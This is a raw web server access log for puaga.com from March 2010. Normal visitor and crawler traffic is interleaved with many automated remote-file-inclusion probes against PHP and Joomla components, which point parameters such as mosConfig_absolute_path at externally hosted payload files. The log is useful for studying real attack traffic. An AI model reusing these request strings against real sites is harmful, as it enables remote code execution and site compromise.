118.217.5.166 - - [07/Mar/2010:10:07:10 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:10:07:19 -0800] "GET /logs/access_100225.log%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:10:07:19 -0800] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:07:36 -0800] "GET /logs/access_100207.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:07:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:07:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:07:49 -0800] "GET /logs/access_100207.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:07:49 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [07/Mar/2010:10:07:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:08:19 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:35 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:35 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:36 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:37 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:37 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:37 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
93.197.183.28 - - [07/Mar/2010:10:08:37 -0800] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/style/5.style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:08:47 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:08:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:08:53 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:08:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:08:54 -0800] "GET /logs/access_100227.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:09:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:09:01 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:09:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:09:03 -0800] "GET /logs/access_100227.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:10:09:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:10:09:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:10:09:38 -0800] "GET /logs/access_100131.log%20%20//include/admin.lib.inc.php?site_path=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:09:56 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:09:56 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:09:56 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:10:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:10:16 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:10:16 -0800] "GET /logs/access_100210.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [07/Mar/2010:10:10:31 -0800] "GET /logs/access_091227.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [07/Mar/2010:10:10:32 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_091227.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:10:10:38 -0800] "GET /logs/access_100217.log%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:10:54 -0800] "GET /logs/access_100221.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:10:58 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:10:11:23 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:11:39 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:12:04 -0800] "GET /logs/access_100210.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:12:04 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:12:08 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:12:46 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:12:48 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:12:48 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:10:12:48 -0800] "GET /logs/access_100210.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:12:59 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:13:42 -0800] "GET /logs/access_100221.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.148.12.60 - - [07/Mar/2010:10:15:13 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
213.148.12.60 - - [07/Mar/2010:10:15:14 -0800] "GET /forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
213.148.12.60 - - [07/Mar/2010:10:15:14 -0800] "GET /phpbb/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
213.148.12.60 - - [07/Mar/2010:10:15:15 -0800] "GET /phpbb2/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
213.148.12.60 - - [07/Mar/2010:10:15:15 -0800] "GET /forums/index.php HTTP/1.0" 404 5258 "http://puaga.com/forums/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
213.148.12.60 - - [07/Mar/2010:10:15:15 -0800] "GET /board/index.php HTTP/1.0" 404 5258 "http://puaga.com/board/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
184.73.61.159 - - [07/Mar/2010:10:16:34 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "puaga.com"
184.73.61.159 - - [07/Mar/2010:10:16:34 -0800] "GET /orange_g/forum/viewtopic.php?p=28162 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "puaga.com"
200.93.147.154 - - [07/Mar/2010:10:16:47 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:08 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:08 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:08 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:25 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:25 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:25 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:39 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:54 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:54 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:54 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:17:55 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:10:18:08 -0800] "GET /logs/access_100213.log//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [07/Mar/2010:10:18:24 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.206.36.25 - - [07/Mar/2010:10:18:41 -0800] "GET /http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:10:18:52 -0800] "GET /logs/access_100225.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:10:19:27 -0800] "GET /logs/access_100217.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:06 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:07 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
